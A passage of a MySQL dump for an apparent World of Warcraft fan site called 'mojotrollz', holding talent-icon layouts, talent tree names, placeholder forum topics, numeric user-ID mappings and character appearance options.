`type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_psychicscream.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 5, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 5, 4, 'talent_icon', 'icon_border_grey', 'inv_ammo_firetar.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 6, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_shadowpact.png', 5, 4, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_gathershadows.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 7, 3, 'talent_icon', 'icon_border_grey', 'inv_misc_gem_sapphire_01.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_shadow_shadowbolt.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 1, 3, 'talent_icon', 'icon_border_green', 'spell_fire_windsofwoe.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_deathpact.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_fire_fire.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_fire_firebolt.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_curse.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 3, 3, 'talent_icon', 'icon_border_grey_down', 'spell_fire_flameshock.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_shadow_scourgebuild.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 4, 1, 'talent_icon', 'icon_border_grey_down', 'spell_fire_lavaspawn.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_corpseexplode.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_fire_soulburn.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 5, 1, 'talent_icon', 'icon_border_grey_inc', 'spell_fire_volcano.png', 2, 4, 1); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_fire_immolation.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 5, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_shadowwordpain.png', 1, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_fire_selfdestruct.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_fire_fireball.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 1, 1, 'talent_icon', 'icon_border_green', 'spell_nature_abolishmagic.png', 5, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 1, 2, 'talent_icon', 'icon_border_green_right', 'spell_nature_natureswrath.png', 1, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 1, 3, 'talent_icon', 'icon_border_grey_inc_left', 'spell_nature_natureswrath.png', 4, 1, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_stranglevines.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 2, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_starfall.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 2, 3, 'talent_icon', 'icon_border_grey_down', 'inv_staff_01.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 2, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_wispsplode.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_thorns.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 3, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 3, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_crystalball.png', 1, 2, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_naturetouchgrow.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 4, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_purge.png', 1, 2, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_arcane_starfire.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_naturesblessing.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_sentinal.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 6, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_moonglow.png', 5, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 1, 7, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_forceofnature.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 1, 2, 'talent_icon', 'icon_border_green', 'ability_hunter_pet_hyena.png', 5, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 1, 3, 'talent_icon', 'icon_border_green', 'ability_druid_demoralizingroar.png', 5, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 2, 1, 'talent_icon', 'icon_border_grey', 'ability_ambush.png', 5, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 2, 2, 'talent_icon', 'icon_border_grey', 'ability_druid_bash.png', 2, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 2, 3, 'talent_icon', 'icon_border_grey', 'inv_misc_pelt_bear_03.png', 5, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_spiritwolf.png', 2, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 3, 2, 'talent_icon', 'icon_border_grey', 'ability_hunter_pet_bear.png', 1, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 3, 3, 'talent_icon', 'icon_border_grey_down_right', 'inv_misc_monsterclaw_04.png', 3, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 3, 4, 'talent_arrow', 'icon_arrow_grey_down_right', NULL, 0, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_vampiricaura.png', 2, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 4, 2, 'talent_icon', 'icon_border_grey_down', 'ability_hunter_pet_cat.png', 3, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 4, 3, 'talent_icon', 'icon_border_grey_inc', 'ability_ghoulfrenzy.png', 2, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 4, 4, 'talent_icon', 'icon_border_grey_inc', 'ability_racial_cannibalize.png', 2, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 5, 1, 'talent_icon', 'icon_border_grey', 'ability_druid_ravage.png', 2, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 5, 2, 'talent_arrow', 'icon_arrow_grey_down', NULL, 0, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_faeriefire.png', 1, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 6, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_blessingofagility.png', 5, 4, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 2, 7, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_unyeildingstamina.png', 1, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_nature_regeneration.png', 5, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 1, 3, 'talent_icon', 'icon_border_green', 'spell_holy_blessingofstamina.png', 5, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 2, 1, 'talent_icon', 'icon_border_grey_down', 'spell_nature_healingtouch.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_healingwavegreater.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'ability_druid_enrage.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 3, 1, 'talent_arrow', 'icon_arrow_grey_down', NULL, 0, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_frost_windwalkon.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 3, 3, 'talent_icon', 'icon_border_grey_down', 'spell_nature_insectswarm.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 3, 4, 'talent_icon', 'icon_border_grey', 'ability_eyeoftheowl.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 4, 1, 'talent_arrow', 'icon_arrow_grey_down', NULL, 0, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 4, 2, 'talent_icon', 'icon_border_grey_down', 'spell_holy_elunesgrace.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', NULL, 0, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_rejuvenation.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 5, 1, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_ravenform.png', 1, 2, 1); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 5, 2, 'talent_arrow', 'icon_arrow_grey_down', NULL, 0, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 5, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_protectionformnature.png', 5, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 5, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_tranquility.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', NULL, 0, NULL, NULL); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_resistnature.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (11, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'inv_relics_idolofrejuvenation.png', 1, 4, 2); /*!40000 ALTER TABLE `mojotrollz_talent_icon` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_talent_tree CREATE TABLE IF NOT EXISTS `mojotrollz_talent_tree` ( `class` int(10) NOT NULL, `tree1_name` text NOT NULL, `tree1_img` text NOT NULL, `tree2_name` text NOT NULL, `tree2_img` text NOT NULL, `tree3_name` text NOT NULL, `tree3_img` text NOT NULL, PRIMARY KEY (`class`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_talent_tree: ~9 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_talent_tree` DISABLE KEYS */; INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (1, 'Arms', 'warriorArms.jpg', 'Fury', 'warriorFury.jpg', 'Protection', 'warriorProtection.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (2, 'Holy', 'paladinHoly.jpg', 'Protection', 'paladinProtection.jpg', 'Retribution', 'paladinRetribution.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (3, 'Beast Mastery', 'hunterBeastMastery.jpg', 'Marksmanship', 'hunterMarksmanship.jpg', 'Survival', 'hunterSurvival.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (4, 'Assassination', 'rogueAssassination.jpg', 'Combat', 'rogueCombat.jpg', 'Subtlety', 'rogueSubtlety.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (5, 'Discipline', 'priestDiscipline.jpg', 'Holy', 'priestHoly.jpg', 'Shadow', 'priestShadow.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (7, 'Elemental', 'shamanElemental.jpg', 'Enhancement', 'shamanEnhancement.jpg', 'Restoration', 'shamanRestoration.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (8, 'Arcane', 'mageArcane.jpg', 'Fire', 'mageFire.jpg', 'Frost', 'mageFrost.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (9, 'Affliction', 'warlockAffliction.jpg', 'Demonology', 'warlockDemonology.jpg', 'Destruction', 'warlockDestruction.jpg'); INSERT INTO `mojotrollz_talent_tree` (`class`, `tree1_name`, `tree1_img`, `tree2_name`, `tree2_img`, `tree3_name`, `tree3_img`) VALUES (11, 'Balance', 'druidBalance.jpg', 'Feral', 'druidFeral.jpg', 'Restoration', 'druidRestoration.jpg'); /*!40000 ALTER TABLE `mojotrollz_talent_tree` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_topics CREATE TABLE IF NOT EXISTS `mojotrollz_topics` ( `id` int(10) NOT NULL AUTO_INCREMENT, `parent_type` int(10) DEFAULT NULL COMMENT 'topic, quest, item usw.', `parent_id` int(10) DEFAULT NULL COMMENT 'id of parenttype', `relationflag` int(10) DEFAULT NULL COMMENT 'forum, about, comment, playertext', `title` tinytext, `text` tinytext, `link` tinytext COMMENT 'picture, website', `timestamp` timestamp NULL DEFAULT NULL, `by` int(10) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_topics: ~7 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_topics` DISABLE KEYS */; INSERT INTO `mojotrollz_topics` (`id`, `parent_type`, `parent_id`, `relationflag`, `title`, `text`, `link`, `timestamp`, `by`) VALUES (1, 1, 0, NULL, 'test', 'test', 'test', '2014-12-15 21:51:09', NULL); INSERT INTO `mojotrollz_topics` (`id`, `parent_type`, `parent_id`, `relationflag`, `title`, `text`, `link`, `timestamp`, `by`) VALUES (2, 1, 0, NULL, 'test', 'test', 'test', '2014-12-15 21:57:12', NULL); INSERT INTO `mojotrollz_topics` (`id`, `parent_type`, `parent_id`, `relationflag`, `title`, `text`, `link`, `timestamp`, `by`) VALUES (3, 1, 1, 0, 'fghjk', 'undefined', 'dfghjk', '2014-12-18 23:05:56', 11); INSERT INTO `mojotrollz_topics` (`id`, `parent_type`, `parent_id`, `relationflag`, `title`, `text`, `link`, `timestamp`, `by`) VALUES (4, 1, 1, 0, 'fghjk', 'undefined', 'dfghjk', '2014-12-18 23:05:57', 11); INSERT INTO `mojotrollz_topics` (`id`, `parent_type`, `parent_id`, `relationflag`, `title`, `text`, `link`, `timestamp`, `by`) VALUES (5, 1, 1, 0, '', 'undefined', '', '2014-12-18 23:06:10', 11); INSERT INTO `mojotrollz_topics` (`id`, `parent_type`, `parent_id`, `relationflag`, `title`, `text`, `link`, `timestamp`, `by`) VALUES (6, 1, 1, 0, '', 'undefined', '', '2014-12-22 21:50:31', 11); INSERT INTO `mojotrollz_topics` (`id`, `parent_type`, `parent_id`, `relationflag`, `title`, `text`, `link`, `timestamp`, `by`) VALUES (7, 1, 1, 0, '', 'undefined', '', '2014-12-22 21:51:06', 11); /*!40000 ALTER TABLE `mojotrollz_topics` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_user CREATE TABLE IF NOT EXISTS `mojotrollz_user` ( `system_user` int(10) unsigned NOT NULL, `mangos_user` int(11) unsigned NOT NULL, PRIMARY KEY (`system_user`,`mangos_user`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_user: ~13 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_user` DISABLE KEYS */; INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (21, 8); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (22, 9); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (23, 10); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (24, 11); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (25, 12); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (26, 13); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (27, 14); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (28, 15); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (29, 16); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (30, 17); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (31, 18); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (32, 19); INSERT INTO `mojotrollz_user` (`system_user`, `mangos_user`) VALUES (33, 20); /*!40000 ALTER TABLE `mojotrollz_user` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_visuals CREATE TABLE IF NOT EXISTS `mojotrollz_visuals` ( `race` int(10) NOT NULL, `type` int(10) NOT NULL, `id` int(10) NOT NULL, `name` char(25) NOT NULL, PRIMARY KEY (`race`,`type`,`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_visuals: ~559 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_visuals` DISABLE KEYS */; INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 0, 'sun bleached'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 1, 'Milky'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 2, 'Still whit'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 3, 'Normal'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 4, 'Still pretty normal'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 5, 'Sunnyboy'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 6, 'To much sun...'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 7, 'Brownie'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 8, 'Even more brownie'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 0, 9, 'Blacky'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 0, 'Hair 1'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 